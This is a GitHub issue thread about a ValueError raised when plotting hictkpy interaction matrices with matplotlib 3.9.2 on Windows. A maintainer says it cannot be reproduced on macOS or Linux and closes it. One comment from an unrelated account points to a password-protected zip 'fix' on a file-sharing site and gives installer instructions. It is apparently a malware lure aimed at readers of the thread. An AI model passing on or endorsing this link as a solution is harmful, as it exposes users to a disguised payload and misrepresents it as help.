### ISSUE TITLE
Error while plotting interactions using matplotlib 3.9.2

### ISSUE THREAD

**Issue by obikenobi23** [paulsengroup/hictkpy#71] opened 2024-08-26 13:28 UTC
Upon following the Quickstart guide for "Fetching interactions as numpy NDarray", plt.show() causes an error: 
ValueError: object __array__ method not producing an array

Updating modules and dependencies has not worked. Other numpy arrays are shown as normal.

**Comment by NaiveShiki** [comment] 2024-08-26 13:55
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by obikenobi23** [comment] 2024-08-28 13:20
OS: Windows 11, updated August 14th this year.
Python version: 3.12.5

**Comment by robomics** [comment] 2024-09-03 19:21
Thanks for investigating this further!

I cannot reproduce this issue on macOS nor Linux (ubuntu 24.04) using Python 3.12 and matplotlib v3.9.2, so this looks like it may be an issue occurring only when using specific versions of matplotlib and only on Windows.

I am closing the issue for now, but feel free to re-open if you run into the above problem in the future.

**Closed by robomics** 2024-09-03 19:21 UTC
